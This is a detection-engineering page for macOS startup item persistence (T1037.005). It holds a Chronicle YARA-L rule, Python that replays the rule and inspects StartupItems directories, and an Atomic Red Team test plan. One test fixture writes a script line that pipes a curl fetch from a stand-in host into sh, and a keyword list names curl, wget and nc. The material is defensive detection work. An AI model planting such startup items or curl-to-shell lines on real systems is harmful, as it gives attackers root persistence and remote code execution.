T1037.005 Google Chronicle · YARA-L

Detect Startup Items in Google Chronicle

Adversaries may use startup items automatically executed at boot initialization to establish persistence on macOS systems. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information (StartupParameters.plist) used by the system to determine execution order. Although technically deprecated in favor of Launch Daemons, the /Library/StartupItems directory may still exist on systems. An adversary can create the appropriate folders and files in the StartupItems directory to register their own persistence mechanism that executes as root during system boot.

MITRE ATT&CK

Tactic
Persistence, Privilege Escalation
Technique
T1037 Boot or Logon Initialization Scripts
Sub-technique
T1037.005 Startup Items
Canonical reference
https://attack.mitre.org/techniques/T1037/005/

YARA-L Detection Query

Google Chronicle (YARA-L)
rule t1037_005_macos_startup_items_persistence {
  meta:
    author = "Argus Detection Engineering"
    description = "Detects creation or modification of files in /Library/StartupItems or StartupParameters.plist, indicating macOS startup item persistence (T1037.005)"
    mitre_attack_technique = "T1037.005"
    mitre_attack_tactic = "Persistence"
    severity = "HIGH"
    platform = "macOS"
    reference = "https://attack.mitre.org/techniques/T1037/005/"

  events:
    // File writes into the startup item tree, or processes whose command line touches it
    (
      $e.metadata.event_type = "FILE_CREATION" or
      $e.metadata.event_type = "FILE_MODIFICATION" or
      $e.metadata.event_type = "PROCESS_LAUNCH"
    )
    // "(/|$)" also catches creation of the StartupItems directory itself and of an
    // item directory, which carry no trailing slash in target.file.full_path
    (
      re.regex($e.target.file.full_path, `/Library/StartupItems(/|$)`) or
      re.regex($e.target.process.command_line, `/Library/StartupItems`) or
      re.regex($e.target.file.full_path, `StartupParameters\.plist`) or
      re.regex($e.target.process.command_line, `StartupParameters\.plist`)
    )
    // Placeholder carrying the endpoint into alert context
    $e.principal.hostname = $hostname

  condition:
    $e
}
Severity: high. Confidence: high.

Chronicle YARA-L 2.0 rule detecting macOS startup item persistence through UDM-normalized FILE_CREATION, FILE_MODIFICATION, and PROCESS_LAUNCH events referencing /Library/StartupItems or StartupParameters.plist. The $hostname placeholder carries the endpoint into alert context; adding a match section on $hostname would aggregate hits per host over a time window. Note that the path regex also matches /System/Library/StartupItems, which is intentional: writes there are at least as suspicious on a modern macOS.

Data Sources

Google Chronicle (macOS endpoint telemetry via Unified Data Model): Chronicle UDM-normalized macOS events

Required Tables

UDM events: FILE_CREATION, FILE_MODIFICATION, PROCESS_LAUNCH

False Positives & Tuning

  • Legitimate macOS system management tools or older commercial software that still interacts with /Library/StartupItems as part of installation or service registration
  • Security assessment tools conducting authorized persistence enumeration or red team exercises on macOS endpoints ingested into Chronicle
  • IT provisioning automation that cleans up or documents legacy startup items during macOS fleet upgrades, generating file access events against the StartupItems path
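The rule's matching logic, replayed in Python over constructed UDM-shaped events so the coverage and the tuning hook can be checked offline. This is an added example, not code from the page or from Chronicle: the event dicts are constructed to mirror the telemetry listed under Testing Methodology, and the allowlist keyed on principal.process.file.full_path (with a hypothetical /usr/local/bin/fleet-provisioner path) is an assumed tuning pattern, not part of the published rule.

```python
"""Replay of t1037_005_macos_startup_items_persistence over UDM-shaped dicts.

Added example: mirrors the YARA-L events section and adds an allowlist hook
for the tuning cases above. Sample events are constructed, not real telemetry.
"""
import re
from typing import Iterable

EVENT_TYPES = {"FILE_CREATION", "FILE_MODIFICATION", "PROCESS_LAUNCH"}

# Same patterns as the rule; re.search is unanchored, like YARA-L re.regex().
PATH_PATTERNS = [
    re.compile(r"/Library/StartupItems(/|$)"),
    re.compile(r"StartupParameters\.plist"),
]
CMDLINE_PATTERNS = [
    re.compile(r"/Library/StartupItems"),
    re.compile(r"StartupParameters\.plist"),
]

# Hypothetical tuning allowlist (assumption, not in the page's rule): full paths of
# sanctioned fleet tooling whose writes to the StartupItems tree are expected.
ALLOWLISTED_PROCESS_PATHS = {
    "/usr/local/bin/fleet-provisioner",
}


def _get(event: dict, dotted: str) -> str:
    """Walk a dotted UDM path; return '' when any segment is missing or non-string."""
    cur = event
    for key in dotted.split("."):
        if not isinstance(cur, dict) or key not in cur:
            return ""
        cur = cur[key]
    return cur if isinstance(cur, str) else ""


def rule_matches(event: dict) -> bool:
    """True when the event satisfies the rule's event-type and path/command-line filters."""
    if _get(event, "metadata.event_type") not in EVENT_TYPES:
        return False
    path = _get(event, "target.file.full_path")
    cmd = _get(event, "target.process.command_line")
    path_hit = any(p.search(path) for p in PATH_PATTERNS)
    cmd_hit = any(p.search(cmd) for p in CMDLINE_PATTERNS)
    return path_hit or cmd_hit


def is_allowlisted(event: dict) -> bool:
    """Suppress events whose initiating process is sanctioned management tooling."""
    return _get(event, "principal.process.file.full_path") in ALLOWLISTED_PROCESS_PATHS


def evaluate(events: Iterable[dict]) -> list[dict]:
    """Return matching, non-allowlisted events tagged with the hostname placeholder."""
    hits = []
    for ev in events:
        if rule_matches(ev) and not is_allowlisted(ev):
            hits.append({"hostname": _get(ev, "principal.hostname"), "event": ev})
    return hits


# Constructed sample events modelled on the Testing Methodology signals.
SAMPLE_EVENTS = [
    {   # Test 1: StartupParameters.plist written into the new item directory
        "metadata": {"event_type": "FILE_CREATION"},
        "principal": {"hostname": "mac-01", "process": {"file": {"full_path": "/bin/bash"}}},
        "target": {"file": {"full_path": "/Library/StartupItems/AtomicTestItem/StartupParameters.plist"}},
    },
    {   # Test 1: item directory created via mkdir under sudo (command-line match)
        "metadata": {"event_type": "PROCESS_LAUNCH"},
        "principal": {"hostname": "mac-01", "process": {"file": {"full_path": "/usr/bin/sudo"}}},
        "target": {"process": {"command_line": "mkdir -p /Library/StartupItems/AtomicTestItem"}},
    },
    {   # Benign: a LaunchDaemon plist, outside this rule's scope
        "metadata": {"event_type": "FILE_CREATION"},
        "principal": {"hostname": "mac-02", "process": {"file": {"full_path": "/usr/sbin/installer"}}},
        "target": {"file": {"full_path": "/Library/LaunchDaemons/com.example.agent.plist"}},
    },
    {   # Matches the rule but originates from the allowlisted provisioning tool
        "metadata": {"event_type": "FILE_MODIFICATION"},
        "principal": {"hostname": "mac-03", "process": {"file": {"full_path": "/usr/local/bin/fleet-provisioner"}}},
        "target": {"file": {"full_path": "/Library/StartupItems/Legacy/StartupParameters.plist"}},
    },
]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit["hostname"], hit["event"]["metadata"]["event_type"])
```

Run it and the two mac-01 events fire while the LaunchDaemon write and the allowlisted provisioning write do not. Keep the allowlist narrow: keying on the initiating process path alone is bypassable by an attacker who can execute as that binary, so in production pair it with a code-signing or hash field from the endpoint agent where the UDM mapping provides one.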

Testing Methodology

Validate this detection against the three Atomic Red Team tests below. Each test lists the behaviour to exercise and the telemetry you should expect to see.

  1. Test 1: Create Malicious Startup Item Directory and Plist

    Expected signal: File creation events for /Library/StartupItems/AtomicTestItem/ (directory), /Library/StartupItems/AtomicTestItem/AtomicTestItem (shell script), and /Library/StartupItems/AtomicTestItem/StartupParameters.plist. Process creation events for mkdir, bash, chmod with command lines referencing /Library/StartupItems. macOS Unified Log entries for sudo usage. MDE DeviceFileEvents with FolderPath containing /Library/StartupItems and FileName=StartupParameters.plist.

  2. Test 2: Deploy Startup Item with Network Callback Script

    Expected signal: File creation events for /Library/StartupItems/UpdateHelper/ directory and contents. Process creation events for mkdir, bash, chmod with /Library/StartupItems path. The shell script content will contain 'curl' and a network callback URL visible in file content telemetry. Spotlight metadata (kMDItemWhereFroms) will be absent since file was created locally. MDE DeviceFileEvents entries for both the executable and StartupParameters.plist.

  3. Test 3: Simulate Startup Item Execution via Shell

    Expected signal: Process creation events: sudo, bash, and the AtomicExecTest script executing with root privileges. The FolderPath /Library/StartupItems/AtomicExecTest/ appears in both file creation and process execution events. The id and echo commands run as root (uid=0) are visible in child process telemetry. MDE DeviceProcessEvents entries show InitiatingProcessFileName=bash with FolderPath containing /Library/StartupItems.
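A host-side companion to the telemetry checks above: when a Chronicle alert fires, the responder usually wants to see what the startup item would actually run. This added example (not from the page or from Atomic Red Team) walks a StartupItems directory, parses each StartupParameters.plist with the standard-library plistlib, and flags items whose executable is world-writable or references a network callback. The loader convention that the executable is <ItemName>/<ItemName> is the legacy Apple layout that Tests 1 and 3 also use; the callback keyword list (curl from Test 2, plus wget and nc) and the UpdateHelper/Stale fixture are assumptions built for the demo.

```python
"""Inspect a macOS StartupItems tree and summarise each item.

Added example: operates on a directory, not on Chronicle telemetry, and builds a
constructed fixture under a temp dir so it runs anywhere (no writes to /Library).
"""
import plistlib
import re
import stat
import tempfile
from pathlib import Path

# Heuristic callback indicators in the item's script. 'curl' is the indicator the
# test plan names; wget and nc are assumed additions.
CALLBACK_PATTERN = re.compile(rb"\b(curl|wget|nc)\b")


def inspect_startup_items(base: Path) -> list[dict]:
    """Return one record per item directory under base, sorted by name."""
    findings = []
    if not base.is_dir():
        return findings
    for item in sorted(p for p in base.iterdir() if p.is_dir()):
        plist_path = item / "StartupParameters.plist"
        executable = item / item.name  # legacy loader runs <ItemName>/<ItemName>
        record = {
            "item": item.name,
            "has_plist": plist_path.is_file(),
            "provides": [],
            "executable_exists": executable.is_file(),
            "world_writable": False,
            "network_callback": False,
        }
        if record["has_plist"]:
            try:
                with plist_path.open("rb") as fh:
                    params = plistlib.load(fh)
                record["provides"] = list(params.get("Provides", []))
            except (plistlib.InvalidFileException, ValueError):
                record["provides"] = ["<unparseable plist>"]
        if record["executable_exists"]:
            mode = executable.stat().st_mode
            record["world_writable"] = bool(mode & stat.S_IWOTH)
            record["network_callback"] = CALLBACK_PATTERN.search(executable.read_bytes()) is not None
        findings.append(record)
    return findings


def build_fixture(root: Path) -> Path:
    """Create a constructed StartupItems tree: one Test-2-style item and one stale item."""
    base = root / "StartupItems"
    item = base / "UpdateHelper"
    item.mkdir(parents=True)
    with (item / "StartupParameters.plist").open("wb") as fh:
        plistlib.dump({"Description": "Update Helper", "Provides": ["UpdateHelper"],
                       "Requires": ["Network"], "OrderPreference": "Late"}, fh)
    script = item / "UpdateHelper"
    script.write_bytes(b"#!/bin/sh\ncurl -s http://example.invalid/beacon | sh\n")
    script.chmod(0o755)
    stale = base / "Stale"  # plist present, executable missing
    stale.mkdir()
    with (stale / "StartupParameters.plist").open("wb") as fh:
        plistlib.dump({"Provides": ["Stale"]}, fh)
    return base


def run_demo() -> list[dict]:
    """Build the fixture in a temp dir, inspect it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return inspect_startup_items(build_fixture(Path(tmp)))


if __name__ == "__main__":
    for rec in run_demo():
        print(rec)
```

On a real host point inspect_startup_items at Path("/Library/StartupItems") and at Path("/System/Library/StartupItems"); an item whose plist is absent or unparseable is still worth pulling, since the legacy loader is lenient and an adversary has no reason to write a tidy plist.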
